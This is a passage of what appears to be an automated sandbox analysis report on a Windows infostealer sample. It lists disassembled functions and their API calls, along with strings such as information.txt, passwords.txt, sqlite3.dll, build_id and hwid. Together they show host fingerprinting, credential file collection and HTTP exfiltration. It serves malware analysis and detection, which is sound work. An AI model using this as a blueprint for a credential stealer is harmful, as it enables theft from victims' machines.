                                                                                                                    • Part of subcall function 00411997: CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
                                                                                                                    • Part of subcall function 00411997: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                                                                                    • Part of subcall function 00411997: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                                                                                    • Part of subcall function 00411997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                                                                                    • Part of subcall function 00411997: VariantInit.OLEAUT32(?), ref: 00411A5D
                                                                                                                    • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                    • Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                    • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                    • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                    • Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                    • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                    • Part of subcall function 00411563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
                                                                                                                    • Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
                                                                                                                    • Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
                                                                                                                    • Part of subcall function 00411563: ReleaseDC.USER32(00000000,00000000), ref: 00411596
                                                                                                                    • Part of subcall function 00411563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
                                                                                                                    • Part of subcall function 00411563: HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
                                                                                                                    • Part of subcall function 00411563: wsprintfA.USER32 ref: 004115BB
                                                                                                                    • Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
                                                                                                                    • Part of subcall function 00410DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
                                                                                                                    • Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
                                                                                                                    • Part of subcall function 00410DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
                                                                                                                    • Part of subcall function 00410DDB: LocalFree.KERNEL32(00000000), ref: 00410EFF
                                                                                                                    • Part of subcall function 00410D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
                                                                                                                    • Part of subcall function 00410D2E: HeapAlloc.KERNEL32(00000000), ref: 00410D50
                                                                                                                    • Part of subcall function 00410D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
                                                                                                                    • Part of subcall function 00410D2E: wsprintfA.USER32 ref: 00410D7D
                                                                                                                    • Part of subcall function 00410F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
                                                                                                                    • Part of subcall function 00410F51: HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
                                                                                                                    • Part of subcall function 00410F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                                                                                    • Part of subcall function 00410F51: RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
                                                                                                                    • Part of subcall function 00410F51: RegCloseKey.ADVAPI32(00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410FAF
                                                                                                                    • Part of subcall function 00411007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0041107D
                                                                                                                    • Part of subcall function 00411007: wsprintfA.USER32 ref: 004110DB
                                                                                                                    • Part of subcall function 00410FBA: GetSystemInfo.KERNEL32(?), ref: 00410FD4
                                                                                                                    • Part of subcall function 00410FBA: wsprintfA.USER32 ref: 00410FEC
                                                                                                                    • Part of subcall function 00411119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
                                                                                                                    • Part of subcall function 00411119: HeapAlloc.KERNEL32(00000000), ref: 00411138
                                                                                                                    • Part of subcall function 00411119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                                                                                    • Part of subcall function 00411119: wsprintfA.USER32 ref: 0041117A
                                                                                                                    • Part of subcall function 00411192: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004111E9
                                                                                                                    • Part of subcall function 004114A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
                                                                                                                    • Part of subcall function 004114A5: Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                                                                                    • Part of subcall function 004114A5: Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                                                                                    • Part of subcall function 004114A5: CloseHandle.KERNEL32(00000000), ref: 0041154D
                                                                                                                    • Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
                                                                                                                    • Part of subcall function 00411203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                                                                                    • Part of subcall function 00411203: wsprintfA.USER32 ref: 004112DD
                                                                                                                    • Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
                                                                                                                    • Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                                                                                    • Part of subcall function 00411203: lstrlenA.KERNEL32(?), ref: 00411347
                                                                                                                    • Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                                                                                    • Part of subcall function 00411203: RegCloseKey.ADVAPI32(?), ref: 00411446
                                                                                                                    • Part of subcall function 00411203: RegCloseKey.ADVAPI32(?), ref: 00411472
                                                                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000), ref: 00414563
                                                                                                                    • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                    • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$Process$Alloc$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$AllocateCharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                  • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                  • API String ID: 3634126619-1014693891
                                                                                                                  • Opcode ID: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
                                                                                                                  • Instruction ID: 792dbb826b946587ba76db5a11b028a2a1d9662385358a0031bce88e61b043bf
                                                                                                                  • Opcode Fuzzy Hash: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
                                                                                                                  • Instruction Fuzzy Hash: 2A527D71D4001EAACF01FBA2DD429DDB7B5AF04308F51456BB610771A1DBB87E8E8B98
                                                                                                                  Function 004169B6 Relevance: 38.7, APIs: 8, Strings: 14, Instructions: 249sleepCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                    • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 004168C6: StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
                                                                                                                    • Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416925
                                                                                                                    • Part of subcall function 004168C6: StrStrA.SHLWAPI(00000000,?), ref: 0041693A
                                                                                                                    • Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416949
                                                                                                                    • Part of subcall function 004168C6: lstrlenA.KERNEL32(00000000), ref: 00416962
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AA0
                                                                                                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AF9
                                                                                                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B59
                                                                                                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BB2
                                                                                                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BC8
                                                                                                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BDE
                                                                                                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BF0
                                                                                                                  • Sleep.KERNEL32(0000EA60), ref: 00416BFF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrlen$lstrcpy$Sleep
                                                                                                                  • String ID: .vA$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
                                                                                                                  • API String ID: 2840494320-4129404369
                                                                                                                  • Opcode ID: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
                                                                                                                  • Instruction ID: 3295cb3038e640ef7bf1334207e300efc9412b34fd4a8ee3f001cefdb945b7ae
                                                                                                                  • Opcode Fuzzy Hash: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
                                                                                                                  • Instruction Fuzzy Hash: A9915F31E40119ABCF10FBA6ED47ACC7770AF04308F51502BF915B7191DBB8AE898B98
                                                                                                                  Function 0040852E Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 230stringmemoryfileCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 004085D3
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408628
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040862F
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 004086CB
                                                                                                                  • lstrcatA.KERNEL32(?), ref: 004086E4
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 004086EE
                                                                                                                  • lstrcatA.KERNEL32(?,0043719C), ref: 004086FA
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00408704
                                                                                                                  • lstrcatA.KERNEL32(?,004371A0), ref: 00408710
                                                                                                                  • lstrcatA.KERNEL32(?), ref: 0040871D
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00408727
                                                                                                                  • lstrcatA.KERNEL32(?,004371A4), ref: 00408733
                                                                                                                  • lstrcatA.KERNEL32(?), ref: 00408740
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 0040874A
                                                                                                                  • lstrcatA.KERNEL32(?,004371A8), ref: 00408756
                                                                                                                  • lstrcatA.KERNEL32(?), ref: 00408763
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 0040876D
                                                                                                                  • lstrcatA.KERNEL32(?,004371AC), ref: 00408779
                                                                                                                  • lstrcatA.KERNEL32(?,004371B0), ref: 00408785
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 004087BE
                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040880B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                  • String ID: passwords.txt
                                                                                                                  • API String ID: 1956182324-347816968
                                                                                                                  • Opcode ID: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
                                                                                                                  • Instruction ID: 9a12f6b0eacbcb2ed4cda68e664cf834d7366407d3e9ed4d657f0b87806d2d42
                                                                                                                  • Opcode Fuzzy Hash: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
                                                                                                                  • Instruction Fuzzy Hash: A2814032900208AFCF05FFA1EE4A9CD7B76BF08316F205026F501B31A1EB7A5E559B59
                                                                                                                  Function 00404B2E Relevance: 35.4, APIs: 12, Strings: 8, Instructions: 378networkstringfileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                    • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                    • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                                  • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404D83
                                                                                                                  • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404DC7
                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404DF5
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                  • lstrlenA.KERNEL32(?,00436953,",build_id,004377C4,------,004377B8,",hwid,004377A4,------), ref: 004050EE
                                                                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 00405101
                                                                                                                  • HttpSendRequestA.WININET(00000000,?,00000000), ref: 0040510F
                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405177
                                                                                                                  • InternetCloseHandle.WININET(?), ref: 0040518E
                                                                                                                  • InternetCloseHandle.WININET(?), ref: 0040519A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                  • String ID: "$"$------$------$------$8wA$build_id$hwid
                                                                                                                  • API String ID: 3006978581-858375883
                                                                                                                  • Opcode ID: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
                                                                                                                  • Instruction ID: 7219792e9a540e442724c4d24598c6325e7ae8fa207a63d5b21e459a2de286cb
                                                                                                                  • Opcode Fuzzy Hash: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
                                                                                                                  • Instruction Fuzzy Hash: C002C371D5512A9ACF20EB21CD46ADDB7B5FF04308F4140E6A54873191DAB87ECA8FD8
                                                                                                                  Function 00401666 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129memoryfileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00401696
                                                                                                                  • wsprintfW.USER32 ref: 004016BC
                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00401705
                                                                                                                  • _time64.MSVCRT ref: 0040170E
                                                                                                                  • srand.MSVCRT ref: 00401715
                                                                                                                  • rand.MSVCRT ref: 0040171E
                                                                                                                  • _memset.LIBCMT ref: 0040172E
                                                                                                                  • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
                                                                                                                  • _memset.LIBCMT ref: 00401763
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00401771
                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
                                                                                                                  • _memset.LIBCMT ref: 004017BE
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
                                                                                                                  • RtlFreeHeap.NTDLL(00000000), ref: 004017CF
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004017DB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                                                  • String ID: %s%s$delays.tmp
                                                                                                                  • API String ID: 1620473967-1413376734
                                                                                                                  • Opcode ID: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
                                                                                                                  • Instruction ID: 11c0bd3ed3d7e6805384e8c578cb98533790a078e52b8311c5bcc7c05517a4c3
                                                                                                                  • Opcode Fuzzy Hash: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
                                                                                                                  • Instruction Fuzzy Hash: 2B41C8B1900218ABD7205F61AC4CF9F7B7DEB89715F1006BAF109E10A1DA354E54CF28
                                                                                                                  Function 004164BD Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 114stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 004164E2
